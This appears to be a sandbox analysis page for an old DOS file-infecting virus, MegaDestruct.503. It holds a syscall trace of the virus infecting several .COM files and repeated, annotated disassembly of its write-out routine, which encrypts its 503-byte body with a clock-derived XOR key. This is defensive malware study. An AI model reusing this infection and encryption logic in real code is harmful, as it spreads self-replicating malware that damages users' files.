Sample viewer

vx.netlux.org/Virus.DOS.VCC.MegaDestruct.503


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:44.6225625Z 26 PC: 12a72 | Set disk transfer address
2018-12-17T22:57:44.623630647Z 37 PC: 12a80 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:57:44.625244862Z 37 PC: 12a84 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:57:44.626336784Z 78 PC: 12acf | Find first file
2018-12-17T22:57:44.632939016Z 61 PC: 12bcb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:57:44.641190407Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:44.648319237Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:44.650136834Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:44.652747412Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:44.65581076Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:44.657365132Z 44 PC: 12c14 | Get time
0x12c14: mov byte ptr [bp + 0x1f7], dl
; Write-out routine, disassembled at the "Get time" return (PC 0x12c14).
; The instruction at 0x12c14, just above, stores DL into [bp + 0x1f7]; after
; INT 21h/AH=2Ch, DL holds hundredths of a second. The operand of the XOR at
; 0x12c35 is the only byte that differs between the snapshots on this page,
; so [bp + 0x1f7] presumably addresses that immediate (0x12c37) -- TODO confirm.
; The listing shows memory before the store at 0x12c14 has run.
; Analyst note: the key byte at bp+0x1f7 lies outside the XORed range
; (bp+0x1f .. bp+0x1d7) but inside the 503 bytes written (bp+6 .. bp+0x1fc),
; so it is written to the file unmodified.
0x12c18: call 0x12c2e  ; first XOR pass over the in-memory body, before the write
0x12c1b: mov ah, 0x40  ; INT 21h function 40h: write file or device
0x12c1d: mov cx, 0x1f7  ; 0x1f7 = 503 bytes, matching the "Write 503 bytes" log entry
0x12c20: lea dx, word ptr [bp + 6]  ; buffer starts at bp+6; the handle (BX) is set outside this listing
0x12c24: int 0x21
0x12c26: call 0x12c2e  ; second pass with the same key reverses the first in memory
0x12c29: mov ah, 0x3e  ; INT 21h function 3Eh: close file
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]  ; XOR routine: si = first byte of the transformed range
0x12c32: mov cx, 0x1b9  ; 0x1b9 = 441 bytes to process
0x12c35: xor byte ptr [si], 0  ; single-byte key held as an immediate; 0 in this snapshot leaves the data unchanged
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35  ; loop until all 0x1b9 bytes are done
0x12c3c: ret
0x12c3d: add word ptr [bx], di  ; NOTE(review): if bp+0x1f7 is 0x12c37, bp+6+0x1f7 = 0x12c3d, so this and the
0x12c3f: aas  ; following bytes lie past the written body and are probably data decoded as
0x12c40: aas  ; instructions -- confirm against a hex dump
2018-12-17T22:57:44.661235478Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.044877013Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.068886567Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.072426732Z 61 PC: 12bcb | Open file (Filename = 'PRINT.COM')
2018-12-17T22:57:45.081260508Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.093037296Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.094840365Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.097668071Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.100601134Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.102139306Z 44 PC: 12c14 | Get time
0x12c14: mov byte ptr [bp + 0x1f7], dl
; Write-out routine, disassembled at the "Get time" return (PC 0x12c14).
; The instruction at 0x12c14, just above, stores DL into [bp + 0x1f7]; after
; INT 21h/AH=2Ch, DL holds hundredths of a second. The operand of the XOR at
; 0x12c35 is the only byte that differs between the snapshots on this page,
; so [bp + 0x1f7] presumably addresses that immediate (0x12c37) -- TODO confirm.
; The listing shows memory before the store at 0x12c14 has run, so the 0x43
; below is presumably the key left by the previous write.
; Analyst note: the key byte at bp+0x1f7 lies outside the XORed range
; (bp+0x1f .. bp+0x1d7) but inside the 503 bytes written (bp+6 .. bp+0x1fc),
; so it is written to the file unmodified.
0x12c18: call 0x12c2e  ; first XOR pass over the in-memory body, before the write
0x12c1b: mov ah, 0x40  ; INT 21h function 40h: write file or device
0x12c1d: mov cx, 0x1f7  ; 0x1f7 = 503 bytes, matching the "Write 503 bytes" log entry
0x12c20: lea dx, word ptr [bp + 6]  ; buffer starts at bp+6; the handle (BX) is set outside this listing
0x12c24: int 0x21
0x12c26: call 0x12c2e  ; second pass with the same key reverses the first in memory
0x12c29: mov ah, 0x3e  ; INT 21h function 3Eh: close file
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]  ; XOR routine: si = first byte of the transformed range
0x12c32: mov cx, 0x1b9  ; 0x1b9 = 441 bytes to process
0x12c35: xor byte ptr [si], 0x43  ; single-byte key held as an immediate operand
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35  ; loop until all 0x1b9 bytes are done
0x12c3c: ret
0x12c3d: add word ptr [bx], di  ; NOTE(review): if bp+0x1f7 is 0x12c37, bp+6+0x1f7 = 0x12c3d, so this and the
0x12c3f: aas  ; following bytes lie past the written body and are probably data decoded as
0x12c40: aas  ; instructions -- confirm against a hex dump
2018-12-17T22:57:45.106782605Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.116112824Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.125281439Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.129347753Z 61 PC: 12bcb | Open file (Filename = 'HELLO.COM')
2018-12-17T22:57:45.138370113Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.146041373Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.14805003Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.150507018Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.153905787Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.155855672Z 44 PC: 12c14 | Get time
0x12c14: mov byte ptr [bp + 0x1f7], dl
; Write-out routine, disassembled at the "Get time" return (PC 0x12c14).
; The instruction at 0x12c14, just above, stores DL into [bp + 0x1f7]; after
; INT 21h/AH=2Ch, DL holds hundredths of a second. The operand of the XOR at
; 0x12c35 is the only byte that differs between the snapshots on this page,
; so [bp + 0x1f7] presumably addresses that immediate (0x12c37) -- TODO confirm.
; The listing shows memory before the store at 0x12c14 has run, so the 0x49
; below is presumably the key left by the previous write.
; Analyst note: the key byte at bp+0x1f7 lies outside the XORed range
; (bp+0x1f .. bp+0x1d7) but inside the 503 bytes written (bp+6 .. bp+0x1fc),
; so it is written to the file unmodified.
0x12c18: call 0x12c2e  ; first XOR pass over the in-memory body, before the write
0x12c1b: mov ah, 0x40  ; INT 21h function 40h: write file or device
0x12c1d: mov cx, 0x1f7  ; 0x1f7 = 503 bytes, matching the "Write 503 bytes" log entry
0x12c20: lea dx, word ptr [bp + 6]  ; buffer starts at bp+6; the handle (BX) is set outside this listing
0x12c24: int 0x21
0x12c26: call 0x12c2e  ; second pass with the same key reverses the first in memory
0x12c29: mov ah, 0x3e  ; INT 21h function 3Eh: close file
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]  ; XOR routine: si = first byte of the transformed range
0x12c32: mov cx, 0x1b9  ; 0x1b9 = 441 bytes to process
0x12c35: xor byte ptr [si], 0x49  ; single-byte key held as an immediate operand
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35  ; loop until all 0x1b9 bytes are done
0x12c3c: ret
0x12c3d: add word ptr [bx], di  ; NOTE(review): if bp+0x1f7 is 0x12c37, bp+6+0x1f7 = 0x12c3d, so this and the
0x12c3f: aas  ; following bytes lie past the written body and are probably data decoded as
0x12c40: aas  ; instructions -- confirm against a hex dump
2018-12-17T22:57:45.160794707Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.170394332Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.179770659Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.183980953Z 61 PC: 12bcb | Open file (Filename = 'PHANG.COM')
2018-12-17T22:57:45.191677852Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.19938004Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.201994875Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.203626633Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.207049247Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.209102928Z 44 PC: 12c14 | Get time
0x12c14: mov byte ptr [bp + 0x1f7], dl
; Write-out routine, disassembled at the "Get time" return (PC 0x12c14).
; The instruction at 0x12c14, just above, stores DL into [bp + 0x1f7]; after
; INT 21h/AH=2Ch, DL holds hundredths of a second. The operand of the XOR at
; 0x12c35 is the only byte that differs between the snapshots on this page,
; so [bp + 0x1f7] presumably addresses that immediate (0x12c37) -- TODO confirm.
; The listing shows memory before the store at 0x12c14 has run, so the 0x4e
; below is presumably the key left by the previous write.
; Analyst note: the key byte at bp+0x1f7 lies outside the XORed range
; (bp+0x1f .. bp+0x1d7) but inside the 503 bytes written (bp+6 .. bp+0x1fc),
; so it is written to the file unmodified.
0x12c18: call 0x12c2e  ; first XOR pass over the in-memory body, before the write
0x12c1b: mov ah, 0x40  ; INT 21h function 40h: write file or device
0x12c1d: mov cx, 0x1f7  ; 0x1f7 = 503 bytes, matching the "Write 503 bytes" log entry
0x12c20: lea dx, word ptr [bp + 6]  ; buffer starts at bp+6; the handle (BX) is set outside this listing
0x12c24: int 0x21
0x12c26: call 0x12c2e  ; second pass with the same key reverses the first in memory
0x12c29: mov ah, 0x3e  ; INT 21h function 3Eh: close file
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]  ; XOR routine: si = first byte of the transformed range
0x12c32: mov cx, 0x1b9  ; 0x1b9 = 441 bytes to process
0x12c35: xor byte ptr [si], 0x4e  ; single-byte key held as an immediate operand
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35  ; loop until all 0x1b9 bytes are done
0x12c3c: ret
0x12c3d: add word ptr [bx], di  ; NOTE(review): if bp+0x1f7 is 0x12c37, bp+6+0x1f7 = 0x12c3d, so this and the
0x12c3f: aas  ; following bytes lie past the written body and are probably data decoded as
0x12c40: aas  ; instructions -- confirm against a hex dump
2018-12-17T22:57:45.211680843Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.221022805Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.231100639Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.23485696Z 61 PC: 12bcb | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:57:45.242733587Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.250113009Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.252976832Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.254909275Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.25824221Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.261146941Z 44 PC: 12c14 | Get time
0x12c14: mov byte ptr [bp + 0x1f7], dl
; Write-out routine, disassembled at the "Get time" return (PC 0x12c14).
; The instruction at 0x12c14, just above, stores DL into [bp + 0x1f7]; after
; INT 21h/AH=2Ch, DL holds hundredths of a second. The operand of the XOR at
; 0x12c35 is the only byte that differs between the snapshots on this page,
; so [bp + 0x1f7] presumably addresses that immediate (0x12c37) -- TODO confirm.
; The listing shows memory before the store at 0x12c14 has run, so the 0x53
; below is presumably the key left by the previous write.
; Analyst note: the key byte at bp+0x1f7 lies outside the XORed range
; (bp+0x1f .. bp+0x1d7) but inside the 503 bytes written (bp+6 .. bp+0x1fc),
; so it is written to the file unmodified.
0x12c18: call 0x12c2e  ; first XOR pass over the in-memory body, before the write
0x12c1b: mov ah, 0x40  ; INT 21h function 40h: write file or device
0x12c1d: mov cx, 0x1f7  ; 0x1f7 = 503 bytes, matching the "Write 503 bytes" log entry
0x12c20: lea dx, word ptr [bp + 6]  ; buffer starts at bp+6; the handle (BX) is set outside this listing
0x12c24: int 0x21
0x12c26: call 0x12c2e  ; second pass with the same key reverses the first in memory
0x12c29: mov ah, 0x3e  ; INT 21h function 3Eh: close file
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]  ; XOR routine: si = first byte of the transformed range
0x12c32: mov cx, 0x1b9  ; 0x1b9 = 441 bytes to process
0x12c35: xor byte ptr [si], 0x53  ; single-byte key held as an immediate operand
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35  ; loop until all 0x1b9 bytes are done
0x12c3c: ret
0x12c3d: add word ptr [bx], di  ; NOTE(review): if bp+0x1f7 is 0x12c37, bp+6+0x1f7 = 0x12c3d, so this and the
0x12c3f: aas  ; following bytes lie past the written body and are probably data decoded as
0x12c40: aas  ; instructions -- confirm against a hex dump
2018-12-17T22:57:45.26402452Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.274611031Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.284866319Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.288224231Z 61 PC: 12bcb | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:57:45.296156762Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.304585807Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.306898454Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.308897262Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.312559857Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.31510402Z 44 PC: 12c14 | Get time
0x12c14: mov byte ptr [bp + 0x1f7], dl
; Write-out routine, disassembled at the "Get time" return (PC 0x12c14).
; The instruction at 0x12c14, just above, stores DL into [bp + 0x1f7]; after
; INT 21h/AH=2Ch, DL holds hundredths of a second. The operand of the XOR at
; 0x12c35 is the only byte that differs between the snapshots on this page,
; so [bp + 0x1f7] presumably addresses that immediate (0x12c37) -- TODO confirm.
; The listing shows memory before the store at 0x12c14 has run, so the 0x53
; below is presumably the key left by the previous write; the snapshot before
; this one shows the same value, so a key can repeat between copies.
; Analyst note: the key byte at bp+0x1f7 lies outside the XORed range
; (bp+0x1f .. bp+0x1d7) but inside the 503 bytes written (bp+6 .. bp+0x1fc),
; so it is written to the file unmodified.
0x12c18: call 0x12c2e  ; first XOR pass over the in-memory body, before the write
0x12c1b: mov ah, 0x40  ; INT 21h function 40h: write file or device
0x12c1d: mov cx, 0x1f7  ; 0x1f7 = 503 bytes, matching the "Write 503 bytes" log entry
0x12c20: lea dx, word ptr [bp + 6]  ; buffer starts at bp+6; the handle (BX) is set outside this listing
0x12c24: int 0x21
0x12c26: call 0x12c2e  ; second pass with the same key reverses the first in memory
0x12c29: mov ah, 0x3e  ; INT 21h function 3Eh: close file
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]  ; XOR routine: si = first byte of the transformed range
0x12c32: mov cx, 0x1b9  ; 0x1b9 = 441 bytes to process
0x12c35: xor byte ptr [si], 0x53  ; single-byte key held as an immediate operand
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35  ; loop until all 0x1b9 bytes are done
0x12c3c: ret
0x12c3d: add word ptr [bx], di  ; NOTE(review): if bp+0x1f7 is 0x12c37, bp+6+0x1f7 = 0x12c3d, so this and the
0x12c3f: aas  ; following bytes lie past the written body and are probably data decoded as
0x12c40: aas  ; instructions -- confirm against a hex dump
2018-12-17T22:57:45.317967723Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.327394894Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.337152306Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.341153708Z 61 PC: 12bcb | Open file (Filename = 'PAH.COM')
2018-12-17T22:57:45.348497002Z 63 PC: 12bda | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:45.358293728Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.360068925Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.36164611Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:45.365754413Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.367995225Z 44 PC: 12c14 | Get time
0x12c14: mov byte ptr [bp + 0x1f7], dl
; Write-out routine, disassembled at the "Get time" return (PC 0x12c14).
; The instruction at 0x12c14, just above, stores DL into [bp + 0x1f7]; after
; INT 21h/AH=2Ch, DL holds hundredths of a second. The operand of the XOR at
; 0x12c35 is the only byte that differs between the snapshots on this page,
; so [bp + 0x1f7] presumably addresses that immediate (0x12c37) -- TODO confirm.
; The listing shows memory before the store at 0x12c14 has run, so the 0x59
; below is presumably the key left by the previous write.
; Analyst note: the key byte at bp+0x1f7 lies outside the XORed range
; (bp+0x1f .. bp+0x1d7) but inside the 503 bytes written (bp+6 .. bp+0x1fc),
; so it is written to the file unmodified.
0x12c18: call 0x12c2e  ; first XOR pass over the in-memory body, before the write
0x12c1b: mov ah, 0x40  ; INT 21h function 40h: write file or device
0x12c1d: mov cx, 0x1f7  ; 0x1f7 = 503 bytes, matching the "Write 503 bytes" log entry
0x12c20: lea dx, word ptr [bp + 6]  ; buffer starts at bp+6; the handle (BX) is set outside this listing
0x12c24: int 0x21
0x12c26: call 0x12c2e  ; second pass with the same key reverses the first in memory
0x12c29: mov ah, 0x3e  ; INT 21h function 3Eh: close file
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]  ; XOR routine: si = first byte of the transformed range
0x12c32: mov cx, 0x1b9  ; 0x1b9 = 441 bytes to process
0x12c35: xor byte ptr [si], 0x59  ; single-byte key held as an immediate operand
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35  ; loop until all 0x1b9 bytes are done
0x12c3c: ret
0x12c3d: add word ptr [bx], di  ; NOTE(review): if bp+0x1f7 is 0x12c37, bp+6+0x1f7 = 0x12c3d, so this and the
0x12c3f: aas  ; following bytes lie past the written body and are probably data decoded as
0x12c40: aas  ; instructions -- confirm against a hex dump
2018-12-17T22:57:45.371000264Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 5)
2018-12-17T22:57:45.381191602Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.393172984Z 79 PC: 12acf | Find next file
2018-12-17T22:57:45.396363863Z 59 PC: 12ae0 | Change current directory
2018-12-17T22:57:45.402167132Z 26 PC: 12ae9 | Set disk transfer address
2018-12-17T22:57:45.40374615Z 9 PC: 12afb | Display string (String= 'You computher is now infected with: MEGA-DESTRUCTION The Conjurers.... ')
2018-12-17T22:57:45.413239666Z 63 PC: 12bda | Read file or device (Read 47866 bytes on handle 7950)
2018-12-17T22:57:45.41542291Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:57:45.418219908Z 66 PC: 12bf8 | Move file pointer
2018-12-17T22:57:45.420102136Z 64 PC: 12c04 | Write file or device (Write 4 bytes on handle 7950)
2018-12-17T22:57:45.42216274Z 66 PC: 12c10 | Move file pointer
2018-12-17T22:57:45.424627443Z 44 PC: 12c14 | Get time
0x12c14: mov byte ptr [bp + 0x1f7], dl
; Write-out routine, disassembled at the "Get time" return (PC 0x12c14).
; The instruction at 0x12c14, just above, stores DL into [bp + 0x1f7]; after
; INT 21h/AH=2Ch, DL holds hundredths of a second. The operand of the XOR at
; 0x12c35 is the only byte that differs between the snapshots on this page,
; so [bp + 0x1f7] presumably addresses that immediate (0x12c37) -- TODO confirm.
; The listing shows memory before the store at 0x12c14 has run, so the 0x5e
; below is presumably the key left by the previous write.
; NOTE(review): the log entries around this snapshot show no "Open file" and
; report handle 7950, so this pass appears to run without a freshly opened
; target -- confirm against the full trace.
; Analyst note: the key byte at bp+0x1f7 lies outside the XORed range
; (bp+0x1f .. bp+0x1d7) but inside the 503 bytes written (bp+6 .. bp+0x1fc),
; so it is written out unmodified.
0x12c18: call 0x12c2e  ; first XOR pass over the in-memory body, before the write
0x12c1b: mov ah, 0x40  ; INT 21h function 40h: write file or device
0x12c1d: mov cx, 0x1f7  ; 0x1f7 = 503 bytes, matching the "Write 503 bytes" log entry
0x12c20: lea dx, word ptr [bp + 6]  ; buffer starts at bp+6; the handle (BX) is set outside this listing
0x12c24: int 0x21
0x12c26: call 0x12c2e  ; second pass with the same key reverses the first in memory
0x12c29: mov ah, 0x3e  ; INT 21h function 3Eh: close file
0x12c2b: int 0x21
0x12c2d: ret
0x12c2e: lea si, word ptr [bp + 0x1f]  ; XOR routine: si = first byte of the transformed range
0x12c32: mov cx, 0x1b9  ; 0x1b9 = 441 bytes to process
0x12c35: xor byte ptr [si], 0x5e  ; single-byte key held as an immediate operand
0x12c38: inc si
0x12c39: dec cx
0x12c3a: jne 0x12c35  ; loop until all 0x1b9 bytes are done
0x12c3c: ret
0x12c3d: add word ptr [bx], di  ; NOTE(review): if bp+0x1f7 is 0x12c37, bp+6+0x1f7 = 0x12c3d, so this and the
0x12c3f: aas  ; following bytes lie past the written body and are probably data decoded as
0x12c40: aas  ; instructions -- confirm against a hex dump
2018-12-17T22:57:45.427347376Z 64 PC: 12c26 | Write file or device (Write 503 bytes on handle 7950)
2018-12-17T22:57:45.429262466Z 62 PC: 12c2d | Close file
2018-12-17T22:57:45.432964115Z 2 PC: 1411d | Character output (Char = '06')